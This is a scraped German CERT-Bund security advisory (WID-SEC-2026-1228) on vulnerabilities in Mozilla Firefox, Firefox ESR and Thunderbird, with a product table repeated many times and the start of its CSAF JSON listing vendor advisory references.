Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
References
60 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Thunderbird ist ein Open Source E-Mail Client.\r\nFirefox ist ein Open Source Web Browser.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird, Mozilla Firefox ESR und Mozilla Firefox ausnutzen, um seine Privilegien zu erh\u00f6hen, um einen Denial of Service Angriff durchzuf\u00fchren, um Informationen offenzulegen, um falsche Informationen darzustellen, und um Sicherheitsvorkehrungen zu umgehen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1228 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1228.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1228 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1228"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-30 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-30/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-31 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-31/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-32 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-32"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-33 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-33/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-34 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-34/"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4546 vom 2026-04-23",
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00027.html"
},
{
"category": "external",
"summary": "National Vulnerability Database CVE-2026-6748 vom 2026-04-22",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6748"
},
{
"category": "external",
"summary": "National Vulnerability Database CVE-2026-6750 vom 2026-04-22",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6750"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:10610-1 vom 2026-04-25",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6VX2E6MLQKO7DPWQ4ZZHUP2YTTOARCJ2/"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-6229 vom 2026-04-24",
"url": "https://security-tracker.debian.org/tracker/DSA-6229-1"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4549 vom 2026-04-26",
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00030.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10757 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10757"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10767 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10767.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10767 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10767"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:20621-1 vom 2026-04-27",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6A4NBNRGRAA5IER7QAALUZTRHLEXIBXW/"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10757 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10757.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10766 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10766"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10766 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10766.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10767 vom 2026-04-28",
"url": "https://errata.build.resf.org/RLSA-2026:10767"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10757 vom 2026-04-28",
"url": "https://errata.build.resf.org/RLSA-2026:10757"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:21383-1 vom 2026-04-28",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025725.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1649-1 vom 2026-04-29",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025757.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1650-1 vom 2026-04-29",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025756.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-12285 vom 2026-05-01",
"url": "https://linux.oracle.com/errata/ELSA-2026-12285.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10766 vom 2026-04-30",
"url": "https://errata.build.resf.org/RLSA-2026:10766"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:12285 vom 2026-04-30",
"url": "https://access.redhat.com/errata/RHSA-2026:12285"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13537 vom 2026-05-04",
"url": "https://access.redhat.com/errata/RHSA-2026:13537"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:20664-1 vom 2026-05-04",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/VYPE5WKCCCIM4I2XJFAO2S7QLLSWQCSW/"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-13537 vom 2026-05-06",
"url": "https://linux.oracle.com/errata/ELSA-2026-13537.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:13537 vom 2026-05-07",
"url": "https://errata.build.resf.org/RLSA-2026:13537"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1741-1 vom 2026-05-07",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-May/025930.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:12285 vom 2026-05-07",
"url": "https://errata.build.resf.org/RLSA-2026:12285"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:15892 vom 2026-05-11",
"url": "https://access.redhat.com/errata/RHSA-2026:15892"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-15892 vom 2026-05-11",
"url": "https://linux.oracle.com/errata/ELSA-2026-15892.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17689 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17689"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17688 vom 2026-05-15",
"url": "https://access.redhat.com/errata/RHSA-2026:17688"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17687 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17687"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17477 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17477"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:15892 vom 2026-05-13",
"url": "https://errata.build.resf.org/RLSA-2026:15892"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17690 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17690"
},
{
"category": "external",
"summary": "PoC CVE-2026-33626 vom 2026-05-14",
"url": "https://github.com/rootdirective-sec/CVE-2026-33626-Lab"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19466 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19466"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19041 vom 2026-05-19",
"url": "https://access.redhat.com/errata/RHSA-2026:19041"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19201 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19201"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19131 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19131"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19461 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19461"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19462 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19462"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19465 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19465"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19467 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19467"
},
{
"category": "external",
